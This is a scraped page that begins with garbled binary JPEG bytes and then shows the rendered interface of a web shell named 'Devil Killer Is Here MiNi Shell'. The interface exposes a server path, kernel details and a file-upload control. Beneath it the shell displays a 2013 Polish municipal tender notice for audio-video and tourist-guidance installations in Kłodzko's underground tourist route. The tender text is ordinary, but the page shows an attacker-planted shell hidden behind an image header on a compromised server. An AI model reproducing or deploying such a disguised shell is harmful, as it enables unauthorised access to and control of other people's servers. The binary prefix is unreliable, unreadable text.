JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130213/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130213/23077-N-2013.html

<p class="kh_header"><b>Kłodzko: Cz. I Dostawa Wyposażenia - System oprowadzania turystów
Cz. II Prace instalacyjne-instalacja systemu audio-wideo
w Podziemnej Trasie Turystycznej, ul. Zawiszy Czarnego 3, 57-300 Kłodzko.</b><br>
<b>Numer ogłoszenia: 23077 - 2013; data zamieszczenia: 13.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Kłodzko , pl. Bolesława Chrobrego 1, 57-300 Kłodzko, woj. dolnośląskie, tel. 074/8654600, faks 074 8674062.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.klodzko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Cz. I Dostawa Wyposażenia - System oprowadzania turystów
Cz. II Prace instalacyjne-instalacja systemu audio-wideo
w Podziemnej Trasie Turystycznej, ul. Zawiszy Czarnego 3, 57-300 Kłodzko..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> cz. I Dostawa Wyposażenia - System oprowadzania turystów. Wykonawca, którego oferta zostanie wybrana, zobowiązany będzie do dostawy i montażu nowoczesnego, interaktywnego systemu oprowadzania turystów wykorzystujący najnowsze technologie, a także przygotowania treści multimedialnych (filmy, grafika, animacje, dźwięk) zgodnie ze Scenariuszem ekspozycji oraz koncepcją aranżacji plastycznej Podziemnej Trasy Turystycznej im. Tysiąclecia Państwa Polskiego w Kłodzku będącym załącznikiem do niniejszej specyfikacji). 

Uwaga! Wszystkie urządzenia elektryczne zaproponowane do trasy powinny być zabezpieczone przed trudnymi warunkami w Podziemnej Trasie Turystycznej duży poziom wilgoci.


Szczegółowy opis przedmiotu zamówienia stanowi Załącznik nr 1 do SIWZ

                 cz. II: Prace instalacyjne-instalacja systemu audio-wideo w Podziemnej Trasie Turystycznej, ul. Zawiszy   
                 Czarnego 3, 57-300 Kłodzko.


Przedmiotem II części zamówienia jest:  
1.1 Budowa systemu nagłośnienia Podziemnej Trasy Turystycznej wraz z wydzielonym zasilaniem elektrycznym, ul. Zawiszy Czarnego 3, 57-300 Kłodzko.  
1.2 Budowa systemu zasilania urządzeń multimedialnych Podziemnej Trasy Turystycznej wraz z wydzielonym  zasilaniem elektrycznym, ul. Zawiszy Czarnego 3, 57-300 Kłodzko.  
1.3 Roboty budowlane: malowanie pomieszczeń, montaż kraty po uprzednim wykonaniu projektu szkicu  i uzgodnieniu go z konserwatorem zabytków w Wałbrzychu.

2.1 SYSTEM  NAGŁOŚNIENIA:
Zaprojektowano instalacje nagłośnienia poszczególnych sal oraz korytarza podziemnej trasy turystycznej. W poszczególnych salach zainstalowano po 2 sztuki głośników projektorowych 10W 100V tj. 20 szt. Na korytarzu podziemnej trasy turystycznej zainstalowano 49 głośników standardowych o mocy 6W i napięciu zasilania 100V oraz dodatkowe głośniki przy wejściu, wyjściu z Podziemnej Trasy Turystycznej Twierdzy Kłodzkiej oraz w kasie biletowej. Do zasilania głośników projektorowych należy ułożyć przewód YKY 0,6/1 kV 3*2,5mm2., natomiast do zasilania głośników standardowych rozmieszczonych wzdłuż trasy turystycznej należy ułożyć przewód YLY 0,6/1 kV 2*16mm2. Z centralnej szafy nagłośnienia należy zasilić przewodem YKY 0,6/1kV 3*2,5mm2 pulpit mikrofonowy 1- strefowy umieszczony w kasie biletowej przy wejściu i wyjściu z podziemnej trasy turystycznej. Należy doprowadzić z końcowego punktu dystrybucyjnego KPD do pulpitu mikrofonowego znajdującego się przy wyjściu z trasy turystycznej przewód UTP skrętka komputerowa zewnętrzna, ekranowana kategorii 5e żelowana CU 8 żyłowa. Ułożony przewód należy zakończyć wtykiem RJ45.
Zaprojektowany system urządzeń do nagłośnienia sal oraz trasy turystycznej wraz z systemem video sterowanym z umieszczonych na parterze przy wejściu do kas biletowych szaf rackowych 19 42U wyposażonych w system wentylacji oraz system oświetlenia. Szafy należy  ustawić na cokołach o wysokości 200mm. Drzwi szafy wyposażyć w zamki patentowe.  Obudowy szaf należy połączyć z szyną wyrównawczą. Szafa wykonana ze stali, malowana proszkowo. Szafa standardowo wyposażona w ściany boczne oraz drzwi tylne i frontowe. W szafie istnieje możliwość demontażu ścian bocznych, które mocowane są na zamki patentowe.

2.2 SYSTEM  MULTIMEDIALNY
Zaprojektowany system urządzeń do projekcji obrazu sal oraz trasy turystycznej wraz z systemem podglądu obrazu sterowanym z umieszczonej na parterze przy wejściu do kas biletowych szafy rackowej 19 42U wyposażonej w system wentylacji oraz system oświetlenia. Szafę należy ustawić na cokole o wysokości 200mm. Drzwi szafy wyposażyć 
w zamek patentowy. Obudowę szafy należy połączyć z szyną wyrównawczą. Szafa wykonana ze stali, malowana proszkowo. Szafa standardowo wyposażona w ściany boczne oraz drzwi tylne i frontowe. W szafie istnieje możliwość demontażu ścian bocznych, które mocowane są na zamki patentowe.

2.3 INSTALACJA ELEKTRYCZNA

Obiekt zasilić wewnętrzną linią zasilającą /w.l.z/ z istniejącej rozdzielnicy n.n- linią YKY 5x 25mm kw. rozdzielnicę główną R w pomieszczeniach wystawowo - konferencyjnych Z R zasilić  instalację odbiorczą poprzez rozdzielnicę: R1 pomieszczenie regimentu.

2.4. Zaleca się, aby każdy Wykonawca zapoznał się z terenem budowy celem uzyskania dodatkowych informacji
przydatnych do wyceny prac i złożenia oferty, gdyż wyklucza się możliwość roszczeń Wykonawcy z tytułu błędnego
skalkulowania ceny lub pominięcia elementów niezbędnych do wykonania umowy. Podstawą wykonania zadania jest
dokumentacja projektowa. 
2.5. Prace będące przedmiotem zamówienia zostaną wykonane na podstawie szczegółowych uzgodnień. Wykonawcy
zobowiązani są użyć do wykonania zamówienia urządzeń i materiałów odpowiadających wymaganiom Normy oraz
innym określonym w specyfikacji technicznej wykonania i odbioru robót budowlanych i dokumentacji projektowej.
Wykonawca ma obowiązek posiadać w stosunku do użytych materiałów i urządzeń dokumenty zezwalające na ich stosowanie w budownictwie (atesty, certyfikaty, deklaracje zgodności, świadectwa jakości).

2.6.  Przedstawione w SIWZ urządzenia techniczne, wyroby i materiały należy traktować jako przykładowe. Zamawiający dopuszcza ujęcie w ofercie, a następnie zastosowanie innych materiałów i urządzeń niż podane w SIWZ pod warunkiem zapewnienia parametrów  nie gorszych niż określone w specyfikacji, zapewniające efekt założony przez Zamawiającego (techniczny, ekonomiczny, ekologiczny). Wykonawca, który powołuje się na rozwiązania równoważne jest obowiązany wykazać spełnienie wymagań określonych przez Zamawiającego.

2.7. Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom zgodnie z art. 36 ust. 4 Pzp (zgodnie z załączonym wzorem zał. Nr 11). W przypadku, gdy Wykonawca wykonuje przedmiot zamówienia przy pomocy podwykonawcy, Wykonawca otrzyma wynagrodzenie za wykonanie zamówienia po przedstawieniu Zamawiającemu dokumentów (np. oświadczeń) świadczących o rozliczeniu się Wykonawcy z podwykonawcą.

2.8.  W celu wykonania swoich obowiązków w zakresie objętym proponowaną ceną ofertową Wykonawca zobowiązuje się do: 
1.	wykonania robót budowlanych zgodnie z dokumentacją projektową, specyfikacjami technicznymi wykonania i odbioru robót budowlanych, innymi warunkami narzuconymi przez inwestora z obowiązującymi przepisami, normami, sztuką budowlaną, 
2.	zapewnienia i przeprowadzenia prób, sprawdzeń i rozruchu instalacji, 
3.	użycia materiałów gwarantujących odpowiednią jakość, o parametrach technicznych i jakościowych nie gorszych niż określone w dokumentacji projektowej i specyfikacjach technicznych wykonania i odbioru robót budowlanych,
4.	zapewnienia kierownictwa i nadzoru nad realizowanym przedmiotem umowy,
5.	organizacji i utrzymania zaplecza niezbędnego dla realizowanego przedmiotu umowy,
6.	uporządkowania terenu budowy po zakończeniu robót i przekazania go w terminie ustalonym dla odbioru końcowego,
7.	wykonania zabezpieczenia budowy i pomieszczeń oraz ich ochrony w okresie realizacji umowy, aż do dnia przekazania wykonanego przedmiotu umowy Zamawiającemu,
8.	odpowiedniego oznakowania terenu budowy; 
9.	ponoszenia kosztów dostawy dla potrzeb realizacji przedmiotu umowy: energii elektrycznej, energii cieplnej, wody,
10.	organizacji siły roboczej i pracy niezbędnych specjalistów wraz z nadzorem bezpośrednim nad robotami,
11.	zapewnienia pracy sprzętu budowlano-montażowego i środków transportu,
12.	zapewnienia właściwych warunków składowania materiałów oraz ich ochronę,
13.	zabezpieczenia terenu robót i pomieszczeń przed dostępem osób trzecich w sposób zapewniający bezpieczne ich prowadzenie, 
14.	realizacji robót w sposób nie powodujący szkód, w tym zagrożenia ludzi i mienia Zamawiającego.
Przedmiot zamówienia szczegółowo opisuje projekt budowlany, specyfikacja techniczna wykonania i odbioru robót oraz dodatkowe wymagania narzucone przez Inwestora w siwz.

1. Dodatkowe wymagania:
1. Rozruch systemu, bezpłatne przeszkolenie pracowników wskazanych przez Zamawiającego w zakresie eksploatacji systemu.  
2. Montaż urządzeń takich jak: głośniki, oprawy oświetleniowe itp. na podkładkach dystansowych grubości 5 mm wykonanych z gumy.
3. Po wykonaniu przedmiotu zlecenia obiekty Podziemnej Trasy Turystycznej w której prowadzone były prace muszą być wysprzątane, gotowe na przyjęcie turystów.
4. Opis przedmiotu zamówienia zawarty jest w: projekcie budowlanym, specyfikacji technicznej wykonania i odbioru robót, przedmiarze robót oraz wymaganiach dodatkowych.

Uwagi:
Przedmiar robót ma wyłącznie charakter pomocniczy do opracowania oferty - kosztorysu ofertowego.


5.W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez  zamawiającego w SIWZ (zgodnie z art. 25 ust. 1 pkt 2 Ustawy PZP i wyszczególnione w § 5  Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2009r. Nr 226, poz. 1817), Zamawiający żąda dostarczenia wraz z ofertą jako załącznika: 
 cz. I - Wykonawca dostarczy na nośniku danych elektronicznych min. 1 próbkę zrealizowanych animacji 3D.  
                cz.  I i II - karty katalogowe/specyfikacje techniczne dostarczanych urządzeń, zgodnie z zał. 9




W zakres zamówienia wchodzą wszystkie prace, materiały, urządzenia i usługi niezbędne do jego kompleksowego wykonania - zarówno wynikające wprost z opisu przedmiotu zamówienia, jak również w nich nieujęte
Wskazanie w opisie przedmiotu zamówienia przykładowych: znaków towarowych, patentów lub pochodzenia, nie ma na celu naruszenia art. 7 i art. 29 Ustawy PZP, a służy jedynie jak najdokładniejszemu przedstawieniu oczekiwań Zamawiającego. Zamawiający dopuszcza rozwiązania równoważne pod warunkiem zachowania parametrów technicznych, jakościowych i funkcjonalnych co najmniej takich jak przedstawione w opisie.
Zamawiający dopuszcza rozwiązania równoważne opisanym za pomocą norm, aprobat, specyfikacji technicznych i systemów odniesienia, o których mowa w art. 30 ust. 1-3 Ustawy PZP. Wykonawca, który powołuje się na rozwiązania równoważne tak opisanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego materiały spełniają wymagania określone przez Zamawiającego (art. 30 ust. 5 Ustawy PZP).
Dodatkowe informacje
Zamawiający nie wyraża zgody na składanie ofert wariantowych.
Zamawiający dopuszcza składanie ofert częściowych. Zamawiający dopuszcza możliwości wyboru na każdą część zadania innego Wykonawcy.
Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów.
Zamawiający nie przewiduje zawarcia umowy ramowej i aukcji elektronicznej.
Zamawiający nie przewiduje zebrania wykonawców.
Zamawiający nie przewiduje zamówienia uzupełniające, o których mowa w art. 67 ust 1 pkt 6 Ustawy PZP.
Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom
Termin wykonania zamówienia art. 36 ust. 1 pkt 4 ustawy
Zamawiający ustala termin wykonania Zamówienia jako termin wymagany dla I części zamówienia do 22.04.2013. Dla cz. II zamówienia termin wymagany wynosi 2 miesiące licząc od daty zawarcia umowy. Termin może ulec zmianie wskutek wydłużenia się procedury postępowania o udzielenie Zamówienia publicznego w trybie przetargu nieograniczonego o czas wymagany przepisami określonymi Ustawą PZP..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.31.10.00-0, 32.34.24.00-6, 45.31.56.00-4, 45.40.00.00-1, 32.32.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 22.04.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający ustala wadium w wysokości 6.000,00 zł brutto dla I części zamówienia (słownie sześć tysięcy złotych 0/100) oraz 8.000 zł brutto dla II części zamówienia (słownie osiem tysięcy złotych 0/100 ). Wadium wnosi się na okres związania ofertą.

Wadium może być wniesione w formach przewidzianych w art. 45 ust 6 Ustawy PZP. Wadium wniesione w pieniądzu Wykonawca wpłaca przelewem przed terminem składania ofert na rachunek Zamawiającego, tak aby znalazły się one na koncie Zamawiającego przed datą i godziną składania ofert.

Nr rachunku Zamawiającego:
Bank Spółdzielczy w Strzelinie o w Kłodzku
nr konta 28 9588 0004 7100 1010 2000 0050  z adnotacją 
                                             
Wadium - Cz. I Dostawa Wyposażenia - System oprowadzania turystów.      Wadium -cz. II System nagłośnienia audio video Podziemnej Trasy Turystycznej; 
                                   obraz, dźwięk.
 
Termin wniesienia wadium upływa wraz z terminem składania ofert. 	Zasady zwrotu oraz zatrzymania wadium przez Zamawiającego określa art. 46 Ustawy PZP.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek wspólny dla I i II części zamówienia. Warunek zostanie spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu w/w warunków na druku Załącznika Nr 4.1. do SIWZ. W przypadku Wykonawców wspólnie ubiegających się o zamówienie oświadczenie to składa i podpisuje ustanowiony przez nich pełnomocnik w imieniu wszystkich Wykonawców lub wszyscy Wykonawcy wspólnie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dla I części zamówienia. Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, iż: wykonał, a w   
                        przypadku świadczeń okresowych lub ciągłych wykonuje, w okresie ostatnich trzech lat przed upływem 
                        terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie; dla I części 
zamówienia: co najmniej jedno zamówienie polegające na zaprojektowaniu, dostawie i montażu wraz z uruchomieniem systemu multimedialnego wraz z kontentem multimedialnym w obiekcie turystycznym z podaniem przedmiotu wykonywanej dostawy, dat wykonania i odbiorców oraz załączeniem dokumentów potwierdzających, że ta dostawa te dostawy  zostały wykonane lub są wykonywane należycie (np. referencje).  

Pod pojęciem system multimedialny zamawiający rozumie:  system, który  wykorzystuje różne formy informacji oraz różne formy ich przekazu (np. tekst, dźwięk, grafikę, animacje, wideo) w celu dostarczania odbiorcom informacji w oparciu o elementy multimedialne takie jak: kamera z napromiennikiem podczerwieni, projektor, mata do podłogi, z powierzchnią przystosowaną do projekcji, Oprogramowanie zarządzająco - sterujące interaktywnym podłożem, Ekran projekcyjny; 

Pod pojęciem kontent multimedialny zamawiający rozumie treści (produkty) multimedialne takie jak: animacje, prezentacje, gry, dedykowane efekty interaktywne zawierające  elementy dynamicznie reagujące na ruch wymodelowane w technologii 3D na potrzeby ekspozycji udostępnionych szerokiej publiczności

      W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego 
                        zamówienia, oceniana będzie ich łączna wiedza i doświadczenie. Wykonawca może polegać na wiedzy i 
                        doświadczeniu, potencjale technicznym, osobach zdolnych do wykonywania zamówienia lub  
                        zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi 
                        stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie 
                        dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu 
                        pisemne zobowiązanie (oryginał) tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na 
                        okres korzystania z nich przy wykonywaniu zamówienia.
Warunek dla II części zamówienia:Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, iż: Wykonał w okresie ostatnich pięciu  
    lat przed upływem terminu składania ofert o udzielenie zamówienia, a jeżeli okres prowadzenia 
    działalności jest krótszy - w tym okresie - minimum jedną robotę budowlaną  na kwotę minimum 200 000 
   PLN/brutto. Wykazane roboty budowlane muszą odpowiadać swoim rodzajem przedmiotowi niniejszego   
    zamówienia, czyli musza polegać na wykonaniu stałego profesjonalnego systemu multimedialnego. 
    Należy podać wartości oraz daty i miejsca ich wykonania oraz załączyć dokumenty potwierdzające, że  
    roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone -np. referencje.
                     
                    Pod pojęciem system multimedialny zamawiający rozumie:  system, który  wykorzystuje różne formy   
                     informacji oraz różne formy ich przekazu (np. tekst, dźwięk, grafikę, animacje, wideo) w celu dostarczania 
                    odbiorcom informacji w oparciu o elementy multimedialne takie jak: kamera z napromiennikiem 
                    podczerwieni, projektor, mata do podłogi, z powierzchnią przystosowaną do projekcji, Oprogramowanie 
                    zarządzająco - sterujące interaktywnym podłożem, Ekran projekcyjny; 
                   W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego 
                    zamówienia, oceniana będzie ich łączna wiedza i doświadczenie. Wykonawca może polegać na wiedzy i 
                    doświadczeniu, potencjale technicznym, osobach zdolnych do wykonywania zamówienia lub  
                    zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi 
                    stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie 
                    dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu 
                    pisemne zobowiązanie (oryginał) tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na 
                    okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dla I i II części zamówienia, warunek zostanie spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu w/w warunków na druku Załącznika Nr 4.1. do SIWZ. W przypadku Wykonawców wspólnie ubiegających się o zamówienie oświadczenie to składa i podpisuje ustanowiony przez nich pełnomocnik w imieniu wszystkich Wykonawców lub wszyscy Wykonawcy wspólnie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dla I części zamówienia, warunek zostanie spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu w/w warunków na druku Załącznika Nr 4.1. do SIWZ. W przypadku Wykonawców wspólnie ubiegających się o zamówienie oświadczenie to składa i podpisuje ustanowiony przez nich pełnomocnik w imieniu wszystkich Wykonawców lub wszyscy Wykonawcy wspólnie.

Warunek dla II części zamówienia zostanie uznany za spełniony, jeżeli Wykonawca wykaże, iż dysponuje osobami na stanowisku kierownika budowy/robót posiadającymi stosowne uprawnienia  do  kierowania robotami, tj.:
1.	min. 1 kierownikiem budowy posiadającym uprawnienia w specjalności ogólnobudowlanej;
2.	min. 1 kierownikiem budowy posiadającym uprawnienia w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych;
obowiązujące na terenie Polski i/lub państw członkowskich UE (lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów). 
Do oferty należy dołączyć oświadczenie, że osoby wskazane przez Wykonawcę posiadają wymagane uprawnienia zawodowe i przynależą do właściwej Izby Samorządu Zawodowego lub innej odpowiedniej instytucji w przypadku wykonawców z krajów UE.
W przypadku  wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i osobowy. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonywania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie (oryginał) tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dla I części zamówienia, warunek zostanie spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu w/w warunków na druku Załącznika Nr 4.1. do SIWZ. W przypadku Wykonawców wspólnie ubiegających się o zamówienie oświadczenie to składa i podpisuje ustanowiony przez nich pełnomocnik w imieniu wszystkich Wykonawców lub wszyscy Wykonawcy wspólnie.
Warunek dla II części zamówienia zostanie uznany za spełniony jeżeli Wykonawca wykaże, iż: jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 50.000,00 zł. Należy załączyć dowód opłacenia polisy w przypadku płatności jednorazowej lub dowód opłacenia ostatniej raty w przypadku płatności w ratach, a w przypadku braku opłaconej polisy inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
